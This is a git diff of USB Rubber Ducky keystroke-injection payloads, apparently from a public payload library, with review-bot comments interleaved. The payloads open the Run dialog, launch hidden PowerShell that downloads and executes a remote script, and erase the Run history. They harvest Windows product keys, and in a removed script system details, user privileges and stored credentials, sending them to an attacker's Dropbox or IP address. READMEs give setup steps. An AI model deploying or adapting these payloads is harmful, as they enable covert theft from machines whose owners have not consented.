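Review bot: `$REFRESH_TOKEN`, `$APP_KEY` and `$APP_SECRET` are literals at the top of a script that the README says must be hosted at a downloadable URL, so anyone who can fetch that URL obtains a long-lived credential for the Dropbox app, with whatever scopes it was granted. The same holds for anyone who reads the script from the target's script block logs. The report built here carries `SYSTEMINFO`, `WHOAMI /ALL` and `CMDKEY /LIST` output from the assessed host, and the setup guide this commit deletes asked for "Full Dropbox" access. A header comment should say so, for example `# These values are readable by anyone who can download this file; use an app limited to its own folder and revoke the token after the engagement.` `Send-ToDropbox` also has no comment-based help; a short `.SYNOPSIS` and `.PARAMETER` block would document that `-Content` is sent as the request body and that a failure is only written with `Write-Host`.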
|
||||
|
|
|
@ -1,49 +0,0 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Define the headers required for the access token request
|
||||
|
||||
$headers = @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
#Define the parameters for the access token request
|
||||
|
||||
$body = @{
|
||||
grant_type = "refresh_token"
|
||||
refresh_token = "<REFRESH_TOKEN>"
|
||||
client_id = "<APP_KEY>"
|
||||
client_secret = "<APP_SECRET>"
|
||||
}
|
||||
|
||||
#Request an access token from Dropbox using the body and headers defined above
|
||||
|
||||
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
|
||||
$access_token = $access_token_response.access_token
|
||||
|
||||
#Define headers for the file upload
|
||||
|
||||
$headers = @{
|
||||
"Authorization" = "Bearer $access_token"
|
||||
"Content-Type" = "application/octet-stream"
|
||||
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
|
||||
}
|
||||
|
||||
#Define the report for the file upload
|
||||
|
||||
$body = "# System Information #`n $(SYSTEMINFO | Out-String)"
|
||||
|
||||
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
|
||||
|
||||
$body += "`n# Stored Credentials #`n $(CMDKEY /LIST | Out-String)"
|
||||
|
||||
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||
|
||||
#Upload the report to Dropbox using the headers and body defined above
|
||||
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null
|
|
@ -1,34 +0,0 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
## Description
|
||||
|
||||
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
|
||||
|
||||
## Usage
|
||||
|
||||
### Setup
|
||||
|
||||
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
```
|
||||
python -m http.server 80
|
||||
```
|
||||
- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
|
||||
- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||
```
|
||||
http://<REMOTE_IP_ADDRESS>/script.ps1
|
||||
```
|
||||
|
||||
### Analysis
|
||||
|
||||
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
|
||||
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
|
@ -1,17 +0,0 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||
STRING REMOTE_IP_ADDRESS
|
||||
STRING /script.ps1; iex $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -1,4 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
|
@ -1,8 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
|
@ -0,0 +1,41 @@
|
|||
# Windows Product Key Grabber
|
||||
|
||||
<p>
|
||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
|
||||
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
This payload sends you the target PC's Windows product key via Dropbox.
|
||||
|
||||
## Process
|
||||
|
||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||
2. Opens a Windows Run dialog box.
|
||||
3. Executes a hosted PowerShell script that performs the following actions:
|
||||
- Clears the history of the Windows Run menu.
|
||||
- Recovers Windows product key from target PC.
|
||||
- Sends the Windows product key of the target PC to a file in your Dropbox.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||
|
||||
> [!WARNING]
|
||||
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||
|
||||
## Options
|
||||
|
||||
|Required extension options|Extension|Data type|Default value|Description|
|
||||
|-|-|-|-|-|
|
||||
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
|
||||
|
||||
## Contributors
|
||||
|
||||
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
|
@ -0,0 +1,107 @@
|
|||
REM_BLOCK DOCUMENTATION
|
||||
Title: Windows Product Key Grabber
|
||||
Author: PlumpyTurkey
|
||||
Description: This payload sends you the target PC's Windows product key via Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
Category: Exfiltration
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION WINDOWS_ONLY
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #FAILURE_LED TRUE
|
||||
DEFINE #FAILURE_LED_MODE LED_R
|
||||
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
|
||||
|
||||
IF (($_OS == WINDOWS) == FALSE) THEN
|
||||
IF_DEFINED_TRUE #FAILURE_LED
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
END_IF_DEFINED
|
||||
#FAILURE_ATTACKMODE
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
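Review bot: The RUN_HOSTED_POWERSHELL documentation block says only that the extension "executes a hosted PowerShell script", which understates what the `STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"` line does on the host. It runs whatever the URL returns at that moment, with no integrity check, from the Run dialog, and elevated when `#RHP_ELEVATED_EXECUTION` is TRUE. I would add a line to the REM_BLOCK such as `Note: runs unverified remote content; the command line (hidden window, execution-policy bypass, download piped to IEX) is recorded by process-creation and PowerShell script-block logging.` That tells whoever reviews the host afterwards which records to expect.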
|
|
@ -0,0 +1,47 @@
|
|||
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
$APP_KEY = "XXXXXXXXXXXXXXX"
|
||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||
|
||||
function Send-ToDropbox {
|
||||
[CmdletBinding()]
|
||||
param(
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$Content,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$RefreshToken,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppKey,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppSecret,
|
||||
[string]$OutputFolder = "Exfiltrated-content",
|
||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||
)
|
||||
|
||||
try {
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||
"Authorization" = "Bearer $((
|
||||
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
} -Body @{
|
||||
"grant_type" = "refresh_token";
|
||||
"refresh_token" = $RefreshToken;
|
||||
"client_id" = $AppKey;
|
||||
"client_secret" = $AppSecret
|
||||
}
|
||||
).access_token)";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||
} -Body $Content | Out-Null
|
||||
}
|
||||
catch {
|
||||
Write-Host "An error occurred: $_"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
|
||||
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
|
||||
|
||||
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
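Review bot: This file (apparently the "script.ps1" the README refers to) has no header comment, and its one host-modifying line, `Remove-ItemProperty ... RunMRU" -Name "*" -Force`, deletes every value under the user's RunMRU key, not just the entry this run created. The README's "Clears the history of the Windows Run menu" does not make that scope explicit. I would add a comment block at the top listing what the script touches: the RunMRU values it deletes, the `SoftwareLicensingService` WMI class and the `SoftwareProtectionPlatform` registry key it reads, and the two Dropbox API hosts it contacts. That list is what a tester needs to account for changes to the host, and what a responder would look for in registry auditing and proxy logs.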
|